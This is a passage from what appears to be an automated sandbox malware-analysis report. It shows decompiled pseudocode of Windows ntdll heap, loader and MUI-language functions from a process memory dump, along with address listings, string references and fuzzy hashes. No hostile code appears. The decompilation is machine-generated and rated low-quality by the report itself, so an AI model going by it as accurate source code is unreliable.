								}
								if(_t280 == 0) {
									_t280 = 0;
									L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0151BB40(_t257,  &_v68, _t243);
								if(L014E43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01521370(_t278, 0x14b4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L014F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0151F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01521370(_v16, 0x14b4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0151BB40(_t262,  &_v68, _t244);
								if(L014E43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01521370(_t282, 0x14b4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0151BB40(_t262,  &_v68, _t201);
							if(L014E43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L014F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0151F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01521370(_t280, 0x14b4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0151BB40(_t267,  &_v68, _t245);
							if(L014E43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01521370(_t284, 0x14b4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0151BB40(_t267,  &_v68, _t224);
						if(L014E43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                        0x014e3d3c
                                                                        0x014e3d42
                                                                        0x014e3d44
                                                                        0x014e3d46
                                                                        0x014e3d49
                                                                        0x014e3d4c
                                                                        0x014e3d4f
                                                                        0x014e3d52
                                                                        0x014e3d55
                                                                        0x014e3d58
                                                                        0x014e3d5b
                                                                        0x014e3d5f
                                                                        0x014e3d61
                                                                        0x014e3d66
                                                                        0x01538213
                                                                        0x01538218
                                                                        0x014e4085
                                                                        0x014e4088
                                                                        0x014e408e
                                                                        0x014e4094
                                                                        0x014e409a
                                                                        0x014e40a0
                                                                        0x014e40a6
                                                                        0x014e40a9
                                                                        0x014e40af
                                                                        0x014e40b6
                                                                        0x014e40bd
                                                                        0x014e40bd
                                                                        0x014e3d83
                                                                        0x0153821f
                                                                        0x01538229
                                                                        0x01538238
                                                                        0x01538238
                                                                        0x0153823d
                                                                        0x0153823d
                                                                        0x014e3da0
                                                                        0x014e3daf
                                                                        0x014e3db5
                                                                        0x014e3dba
                                                                        0x014e3dba
                                                                        0x014e3dd4
                                                                        0x014e3e94
                                                                        0x014e3eab
                                                                        0x014e3f6d
                                                                        0x014e3f84
                                                                        0x014e406b
                                                                        0x014e406b
                                                                        0x014e406e
                                                                        0x014e406e
                                                                        0x014e4070
                                                                        0x014e4074
                                                                        0x01538351
                                                                        0x01538351
                                                                        0x014e407a
                                                                        0x014e407f
                                                                        0x0153835d
                                                                        0x01538370
                                                                        0x01538377
                                                                        0x01538379
                                                                        0x0153837c
                                                                        0x0153837c
                                                                        0x0153835d
                                                                        0x00000000
                                                                        0x014e407f
                                                                        0x014e3f8a
                                                                        0x014e3f8d
                                                                        0x014e3f90
                                                                        0x014e3f95
                                                                        0x0153830d
                                                                        0x0153830f
                                                                        0x014e3f9b
                                                                        0x014e3fac
                                                                        0x014e3fae
                                                                        0x014e3fb1
                                                                        0x014e3fb1
                                                                        0x014e3fb6
                                                                        0x01538317
                                                                        0x0153831a
                                                                        0x00000000
                                                                        0x014e3fbc
                                                                        0x014e3fc1
                                                                        0x014e3fc9
                                                                        0x014e3fd7
                                                                        0x014e3fda
                                                                        0x014e3fdd
                                                                        0x014e4021
                                                                        0x014e4021
                                                                        0x014e4029
                                                                        0x014e4030
                                                                        0x014e4044
                                                                        0x014e4046
                                                                        0x014e4046
                                                                        0x014e4044
                                                                        0x014e4049
                                                                        0x01538327
                                                                        0x01538334
                                                                        0x01538339
                                                                        0x0153833c
                                                                        0x014e404f
                                                                        0x014e404f
                                                                        0x014e404f
                                                                        0x014e4051
                                                                        0x014e4056
                                                                        0x014e4063
                                                                        0x014e4063
                                                                        0x014e4068
                                                                        0x00000000
                                                                        0x014e4068
                                                                        0x014e3fdf
                                                                        0x014e3fe2
                                                                        0x014e3fe4
                                                                        0x014e3fe7
                                                                        0x014e3fef
                                                                        0x014e4003
                                                                        0x014e4005
                                                                        0x014e4005
                                                                        0x014e400c
                                                                        0x014e4013
                                                                        0x014e4016
                                                                        0x014e4017
                                                                        0x014e401b
                                                                        0x014e401e
                                                                        0x00000000
                                                                        0x014e401e
                                                                        0x014e3fb6
                                                                        0x014e3eb1
                                                                        0x014e3eb4
                                                                        0x014e3eb7
                                                                        0x014e3ebc
                                                                        0x015382a9
                                                                        0x015382ab
                                                                        0x014e3ec2
                                                                        0x014e3ed3
                                                                        0x014e3ed5
                                                                        0x014e3ed8
                                                                        0x014e3ed8
                                                                        0x014e3edd
                                                                        0x015382b3
                                                                        0x015382b6
                                                                        0x00000000
                                                                        0x014e3ee3
                                                                        0x014e3ee8
                                                                        0x014e3eed
                                                                        0x014e3ef0
                                                                        0x014e3ef3
                                                                        0x014e3f02
                                                                        0x014e3f05
                                                                        0x014e3f08
                                                                        0x015382c0
                                                                        0x015382c3
                                                                        0x015382c5
                                                                        0x015382c8
                                                                        0x015382d0
                                                                        0x015382e4
                                                                        0x015382e6
                                                                        0x015382e6
                                                                        0x015382ed
                                                                        0x015382f4
                                                                        0x015382f7
                                                                        0x015382f8
                                                                        0x015382fc
                                                                        0x015382ff
                                                                        0x015382ff
                                                                        0x014e3f0e
                                                                        0x014e3f11
                                                                        0x014e3f16
                                                                        0x014e3f1d
                                                                        0x014e3f31
                                                                        0x01538307
                                                                        0x01538307
                                                                        0x014e3f31
                                                                        0x014e3f39
                                                                        0x014e3f48
                                                                        0x014e3f4d
                                                                        0x014e3f50
                                                                        0x014e3f50
                                                                        0x014e3f53
                                                                        0x014e3f58
                                                                        0x014e3f65
                                                                        0x014e3f65
                                                                        0x014e3f6a
                                                                        0x00000000
                                                                        0x014e3f6a
                                                                        0x014e3edd
                                                                        0x014e3dda
                                                                        0x014e3ddd
                                                                        0x014e3de0
                                                                        0x014e3de5
                                                                        0x01538245
                                                                        0x014e3deb
                                                                        0x014e3df7
                                                                        0x014e3dfc
                                                                        0x014e3dfe
                                                                        0x014e3e01
                                                                        0x014e3e01
                                                                        0x014e3e06
                                                                        0x0153824d
                                                                        0x0153824f
                                                                        0x01538254
                                                                        0x00000000
                                                                        0x014e3e0c
                                                                        0x014e3e11
                                                                        0x014e3e16
                                                                        0x014e3e19
                                                                        0x014e3e29
                                                                        0x014e3e2c
                                                                        0x014e3e2f
                                                                        0x0153825c
                                                                        0x0153825f
                                                                        0x01538261
                                                                        0x01538264
                                                                        0x0153826c
                                                                        0x01538280
                                                                        0x01538282
                                                                        0x01538282
                                                                        0x01538289
                                                                        0x01538290
                                                                        0x01538293
                                                                        0x01538294
                                                                        0x01538298
                                                                        0x0153829b
                                                                        0x0153829b
                                                                        0x014e3e35
                                                                        0x014e3e38
                                                                        0x014e3e3d
                                                                        0x014e3e44
                                                                        0x014e3e58
                                                                        0x015382a3
                                                                        0x015382a3
                                                                        0x014e3e58
                                                                        0x014e3e60
                                                                        0x014e3e6f
                                                                        0x014e3e74
                                                                        0x014e3e77
                                                                        0x014e3e77
                                                                        0x014e3e7a
                                                                        0x014e3e7f
                                                                        0x014e3e8c
                                                                        0x014e3e8c
                                                                        0x014e3e91
                                                                        0x00000000
                                                                        0x014e3e91

                                                                        Strings
                                                                        • Kernel-MUI-Language-Allowed, xrefs: 014E3DC0
                                                                        • WindowsExcludedProcs, xrefs: 014E3D6F
                                                                        • Kernel-MUI-Number-Allowed, xrefs: 014E3D8C
                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 014E3E97
                                                                        • Kernel-MUI-Language-SKU, xrefs: 014E3F70
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                        • API String ID: 0-258546922
                                                                        • Opcode ID: 27e499f83cf2109aaaa30a4b1b427c1fb0384fb2e8c6637b82e456ad6b42b5d1
                                                                        • Instruction ID: 0c42c304431116694bc5482756596a76b8e4d2bb10a98b5f00acd70c4871ddb0
                                                                        • Opcode Fuzzy Hash: 27e499f83cf2109aaaa30a4b1b427c1fb0384fb2e8c6637b82e456ad6b42b5d1
                                                                        • Instruction Fuzzy Hash: 2BF14F72D00619EFCB16DF99C984AEEBBF9FF58650F14016AE505E7221D7349E01CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014D40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 29%
                                                                        			E014D40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E014DB150();
					} else {
						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E014DB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E014DB150(", passed to %s", _t29);
					}
					_push("\n");
					E014DB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x15c6378 = 1;
						asm("int3");
						 *0x15c6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                        0x014d40e6
                                                                        0x014d40e8
                                                                        0x014d40f1
                                                                        0x0153042d
                                                                        0x0153044c
                                                                        0x01530451
                                                                        0x0153042f
                                                                        0x01530444
                                                                        0x01530449
                                                                        0x0153045d
                                                                        0x01530466
                                                                        0x0153046e
                                                                        0x01530474
                                                                        0x01530475
                                                                        0x0153047a
                                                                        0x0153048a
                                                                        0x0153048c
                                                                        0x01530493
                                                                        0x01530494
                                                                        0x01530494
                                                                        0x00000000
                                                                        0x0153049b
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                        • API String ID: 0-188067316
                                                                        • Opcode ID: a757a431bcfec56be7202a96ad281a03868b819c486b2a879751026032e20ab0
                                                                        • Instruction ID: aa58e49c67cce7f8fa7a7edb2450ad8b9c1e02836ab84077117da5ef5e66b738
                                                                        • Opcode Fuzzy Hash: a757a431bcfec56be7202a96ad281a03868b819c486b2a879751026032e20ab0
                                                                        • Instruction Fuzzy Hash: 270128321046529ED6299B7AA46DF9A77F4EB52F70F2BC02FF0084B6A1CAB49440C221
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014FA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E014FA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E014FDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01519730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0159A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01519660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E014DB150();
					} else {
						E014DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E014DB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E014F7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0159138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E014F7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E014F7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01591582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E014F7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E014F7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01591582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0152D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                        0x014fa229
                                                                        0x014fa231
                                                                        0x014fa23f
                                                                        0x014fa242
                                                                        0x014fa244
                                                                        0x014fa24c
                                                                        0x014fa255
                                                                        0x014fa25a
                                                                        0x014fa25f
                                                                        0x01541c76
                                                                        0x01541c78
                                                                        0x01541c7e
                                                                        0x01541c7f
                                                                        0x01541c81
                                                                        0x01541c82
                                                                        0x01541c84
                                                                        0x01541c89
                                                                        0x01541c8b
                                                                        0x01541c9e
                                                                        0x01541c9e
                                                                        0x01541cab
                                                                        0x01541cb2
                                                                        0x00000000
                                                                        0x01541cb2
                                                                        0x01541c8d
                                                                        0x01541c92
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01541c94
                                                                        0x01541c98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01541c98
                                                                        0x014fa265
                                                                        0x014fa265
                                                                        0x014fa266
                                                                        0x014fa26f
                                                                        0x014fa270
                                                                        0x014fa276
                                                                        0x014fa277
                                                                        0x014fa279
                                                                        0x014fa27e
                                                                        0x014fa282
                                                                        0x01541db5
                                                                        0x01541dbb
                                                                        0x01541dc1
                                                                        0x01541dc5
                                                                        0x01541de4
                                                                        0x01541de9
                                                                        0x01541dc7
                                                                        0x01541ddc
                                                                        0x01541de1
                                                                        0x01541def
                                                                        0x01541df3
                                                                        0x01541df7
                                                                        0x01541dfe
                                                                        0x01541e06
                                                                        0x014fa302
                                                                        0x014fa308
                                                                        0x014fa308
                                                                        0x014fa288
                                                                        0x014fa28d
                                                                        0x014fa294
                                                                        0x01541cc1
                                                                        0x014fa29a
                                                                        0x014fa29a
                                                                        0x014fa29a
                                                                        0x014fa29f
                                                                        0x01541ccb
                                                                        0x01541cd1
                                                                        0x01541cd8
                                                                        0x01541cea
                                                                        0x01541cea
                                                                        0x01541cd8
                                                                        0x014fa2a9
                                                                        0x014fa2af
                                                                        0x014fa2bc
                                                                        0x01541cfd
                                                                        0x014fa2c2
                                                                        0x014fa2c2
                                                                        0x014fa2c2
                                                                        0x014fa2c7
                                                                        0x01541d07
                                                                        0x01541d0d
                                                                        0x01541d14
                                                                        0x01541d1f
                                                                        0x01541d21
                                                                        0x01541d2c
                                                                        0x01541d2c
                                                                        0x01541d2c
                                                                        0x01541d47
                                                                        0x01541d47
                                                                        0x01541d14
                                                                        0x014fa2cd
                                                                        0x014fa2d2
                                                                        0x014fa2d9
                                                                        0x01541d5a
                                                                        0x014fa2df
                                                                        0x014fa2df
                                                                        0x014fa2df
                                                                        0x014fa2e4
                                                                        0x01541d69
                                                                        0x01541d6b
                                                                        0x01541d76
                                                                        0x01541d76
                                                                        0x01541d76
                                                                        0x01541d91
                                                                        0x01541d91
                                                                        0x014fa2ea
                                                                        0x014fa2f0
                                                                        0x014fa2f5
                                                                        0x01541da8
                                                                        0x01541dad
                                                                        0x01541dad
                                                                        0x014fa2fd
                                                                        0x014fa300
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                        • API String ID: 2994545307-2586055223
                                                                        • Opcode ID: 63a77652ee0296c27b6aaeed3724418541d079b14597b6201feed261b10fac3a
                                                                        • Instruction ID: a0bb276559deb9f44e792970037bcaefd8062befd22e37e1b8345988fb969dbc
                                                                        • Opcode Fuzzy Hash: 63a77652ee0296c27b6aaeed3724418541d079b14597b6201feed261b10fac3a
                                                                        • Instruction Fuzzy Hash: 52510472304A829FD712DB68C884F6B7BE8FB90754F19046DF6958B3A1D734E841C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01508E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 44%
                                                                        			E01508E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x15cd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x15c8464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x15c5780 & 0x00000003) != 0) {
							E01555510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x15c5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0151B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x15c7984; // 0xfa2b20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x15c8464; // 0x73b80110
					 *0x15cb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01509B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x15c5780 & 0x00000005) != 0) {
						_push(_t49);
						E01555510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                        0x01508e0f
                                                                        0x01508e16
                                                                        0x01508e19
                                                                        0x01508e1b
                                                                        0x01508e21
                                                                        0x01508e7f
                                                                        0x01508e85
                                                                        0x01549354
                                                                        0x0154936c
                                                                        0x01549371
                                                                        0x0154937b
                                                                        0x01549381
                                                                        0x01549381
                                                                        0x0154937b
                                                                        0x01508e9d
                                                                        0x01508e9d
                                                                        0x01508e29
                                                                        0x01508e2c
                                                                        0x01508e38
                                                                        0x01508e3e
                                                                        0x01508e43
                                                                        0x01508eb5
                                                                        0x01508eb9
                                                                        0x015492aa
                                                                        0x015492af
                                                                        0x015492e8
                                                                        0x015492e8
                                                                        0x015492af
                                                                        0x01508eb9
                                                                        0x01508e45
                                                                        0x01508e53
                                                                        0x01508e5b
                                                                        0x01508e5f
                                                                        0x01508e78
                                                                        0x01508e78
                                                                        0x01508e7d
                                                                        0x01508ec3
                                                                        0x01508ecd
                                                                        0x01508ed2
                                                                        0x01508ed2
                                                                        0x01508ec5
                                                                        0x01508ec5
                                                                        0x00000000
                                                                        0x01508e7d
                                                                        0x01508e67
                                                                        0x01508ea4
                                                                        0x0154931a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01549320
                                                                        0x01508ea4
                                                                        0x01508e70
                                                                        0x01549325
                                                                        0x01549340
                                                                        0x01549345
                                                                        0x01549345
                                                                        0x01508e76
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Strings
                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0154932A
                                                                        • LdrpFindDllActivationContext, xrefs: 01549331, 0154935D
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0154933B, 01549367
                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 01549357
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 0-3779518884
                                                                        • Opcode ID: 7a8928196f548c39df16cd10e66de6ad049175707b5112763c165bde744349f3
                                                                        • Instruction ID: b29f2e9c6f0e19290b5999d876e0e98f492b2e9c6635eb4a46aefc45e1326c90
                                                                        • Opcode Fuzzy Hash: 7a8928196f548c39df16cd10e66de6ad049175707b5112763c165bde744349f3
                                                                        • Instruction Fuzzy Hash: D1410931E007159FEB37AADC888DF7EBBB4BB44258F06456AD9145F1D2E7706C808791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015949A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                        • API String ID: 2994545307-336120773
                                                                        • Opcode ID: 6fc1fe8393705dc8d6bb05afa9b87a135b671df0e9fa3b385560e6351cd0cfed
                                                                        • Instruction ID: 16da6093f1aac3603ccbb1ed2e9c50a938268d9d12e7058203195c496bf09a7c
                                                                        • Opcode Fuzzy Hash: 6fc1fe8393705dc8d6bb05afa9b87a135b671df0e9fa3b385560e6351cd0cfed
                                                                        • Instruction Fuzzy Hash: 74312331100101EFDB20DB6AC988F6B73EAFB05A60F25855EF405CF260D6B8AC41C66A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014E8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E014E8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
